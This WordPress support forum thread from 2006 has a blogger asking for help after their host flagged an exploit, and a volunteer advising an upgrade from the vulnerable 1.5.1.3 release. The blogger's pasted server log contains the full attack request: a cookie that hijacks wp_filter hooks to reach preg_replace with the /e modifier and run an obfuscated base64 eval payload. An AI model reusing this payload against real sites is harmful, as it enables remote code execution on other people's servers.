Title: help! wordpress exploited Last modified: August 18, 2016 --- # help! wordpress exploited * [regehr](https://wordpress.org/support/users/regehr/) * (@regehr) * [20 years, 1 month ago](https://wordpress.org/support/topic/help-wordpress-exploited/) * i received word from my host (lunarpages) that my installation of wordpress has been exploited. as i just installed wordpress through fantastico on Cpanel, so i don’t know what to do to fix the problem. i wonder if anyone out there can help me? Viewing 4 replies - 1 through 4 (of 4 total) * [Mark (podz)](https://wordpress.org/support/users/podz/) * (@podz) * [20 years, 1 month ago](https://wordpress.org/support/topic/help-wordpress-exploited/#post-369247) * Lunarpages are blaming WP without proof. What exactly is the problem and where is your site? * Thread Starter [regehr](https://wordpress.org/support/users/regehr/) * (@regehr) * [20 years, 1 month ago](https://wordpress.org/support/topic/help-wordpress-exploited/#post-369248) * It could be the LP is blaming WP, but as an end user, I have no idea. They sent me gibberish that means nothing to me. * The site is [http://democraticspace.com/blog](http://democraticspace.com/blog) * This is what they emailed me — if you have any thoughts, I’d be more grateful. * *** * DOCUMENT_ROOT=/home/democ3/public_htmlHTTP_ACCEPT=*/*HTTP_COOKIE=wp_filter[query_vars][ 0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0; wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][ 1][accepted_args]=1;cache_lastpostmodified[server]=//e;cache_lastpostdate[server] =YXJnc1swXT1ldmFsKGJhc2U2NF9kZWNvZGUoY2hyKDk5KS5jaHIoNTEpLmNocigxMDgpLmNocigxMjIpLmNocigxMDApLmNocig3MSkuY2hyKDg2KS5jaHIoMTE2KS5jaHIoNzUpLmNocig2NykuY2hyKDc0KS5jaHIoMTA2KS5jaHIoOTApLmNocig2NykuY2hyKDY1KS5jaHIoMTE4KS5jaHIoMTAwKS5jaHIoNzEpLmNocig0OSkuY2hyKDExOSkuY2hyKDc5KS5jaHIoNTApLmNocig3OCkuY2hyKDQ5KS5jaHIoOTkpLmNocigxMDkpLmNocigxMTkpLmNocigxMDMpLmNocig3NikuY2hyKDg1KS5jaHIoNTYpLmNocigxMDMpLmNocig5NykuY2hyKDcyKS5jaHIoODIpLmNocig0OCkuY2hyKDk5KS5jaHIoNjgpLmNocigxMTEpLmNocigxMTgpLmNocig3NikuY2hyKDUxKS5jaHIoMTAwKS5jaHIoNTEpLmNocigxMDApLmNocigxMjEpLmNocig1MykuY2hyKDExMCkuY2hyKDkwKS5jaHIoODcpLmNocig1NykuY2hyKDEwNikuY2hyKDk3KS5jaHIoODgpLmNocig4MikuY2hyKDExMikuY2hyKDkwKS5jaHIoODgpLmNocig3NykuY2hyKDExNykuY2hyKDg5KS5jaHIoNTApLmNocig1NykuY2hyKDExNikuY2hyKDc2KS5jaHIoNTApLmNocig3NCkuY2hyKDEwNCkuY2hyKDg5KS5jaHIoMTEwKS5jaHIoMTA4KS5jaHIoMTE5KS5jaHIoODkpLmNocig4NykuY2hyKDQ5KS5jaHIoMTE4KS5jaHIoNzYpLmNocig1MCkuY2hyKDEwNCkuY2hyKDEwOCkuY2hyKDk3KS5jaHIoNzEpLmNocig4NSkuY2hyKDExNykuY2hyKDEwMCkuY2hyKDcyKS5jaHIoMTA0KS5jaHIoNDgpLmNocig3OSkuY2hyKDUxKS5jaHIoNjYpLmNocigxMDgpLmNocig5OSkuY2hyKDEwOSkuY2hyKDExOSkuY2hyKDEwMykuY2hyKDk3KS5jaHIoNzEpLmNocig4NikuY2hyKDExMSkuY2hyKDkwKS5jaHIoODMpLmNocig1MykuY2hyKDQ4KS5jaHIoMTAxKS5jaHIoNzIpLmNocig4MSkuY2hyKDU1KS5jaHIoOTkpLmNocigxMDkpLmNocig0OCkuY2hyKDEwMykuY2hyKDk3KS5jaHIoNzEpLmNocig4NikuY2hyKDExMSkuY2hyKDkwKS5jaHIoODMpLmNocig1MykuY2hyKDQ4KS5jaHIoMTAxKS5jaHIoNzIpLmNocig4MSkuY2hyKDEwNSkuY2hyKDc1KS5jaHIoODQpLmNocigxMTUpLmNocig2MSkuY2hyKDMyKSkpLmRpZSgpJmFyZ3NbMV09eA ==;wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][ accepted_args]=1;wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[ query_vars][2][0][accepted_args]=0;wp_filter[query_vars][3][0][function]=preg_replace; wp_filter[query_vars][3][0][accepted_args]=3;HTTP_HOST=democraticspace.comHTTP_USER_AGENT =Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)PATH =/bin:/usr/binREDIRECT_QUERY_STRING=year=2006&monthnum=01&name=jan-7-2006-election- update-conservatives-climbing&page=REDIRECT_STATUS=200REDIRECT_URL=/blog/2006/ 01/jan-7-2006-election-update-conservatives-climbing/REMOTE_ADDR=219.95.143.133REMOTE_PORT =47077SCRIPT_FILENAME=/home/democ3/public_html/blog/index.phpSERVER_ADDR=216.227.209.174SERVER_ADMIN =webmaster@democraticspace.comSERVER_NAME=www.democraticspace.comSERVER_PORT= 80SERVER_SIGNATURE=
Apache/1.3.34 Server at [http://www.democraticspace.com](http://www.democraticspace.com) Port 80
SERVER_SOFTWARE=Apache/1.3.34 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.1 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7aGATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.0REQUEST_METHOD =GETQUERY_STRING=year=2006&monthnum=01&name=jan-7-2006-election-update-conservatives- climbing&page=REQUEST_URI=/blog/2006/01/jan-7-2006-election-update-conservatives- climbing/SCRIPT_NAME=/blog/index.phpPATH_TRANSLATED=/home/democ3/public_html/ blog/index.php * [Mark (podz)](https://wordpress.org/support/users/podz/) * (@podz) * [20 years, 1 month ago](https://wordpress.org/support/topic/help-wordpress-exploited/#post-369251) * What version of WP were you using? * [Mark (podz)](https://wordpress.org/support/users/podz/) * (@podz) * [20 years, 1 month ago](https://wordpress.org/support/topic/help-wordpress-exploited/#post-369252) * Google’s cache of your site shows version 1.5.1.3 This has known exploits. Were you using that version? * Advise your host that you will upgrade immediately if they allow you access. * You MUST upgrade to 2.0.2 or 1.5.3 Viewing 4 replies - 1 through 4 (of 4 total) The topic ‘help! wordpress exploited’ is closed to new replies. ## Tags * [exploited](https://wordpress.org/support/topic-tag/exploited/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 4 replies * 2 participants * Last reply from: [Mark (podz)](https://wordpress.org/support/users/podz/) * Last activity: [20 years, 1 month ago](https://wordpress.org/support/topic/help-wordpress-exploited/#post-369252) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics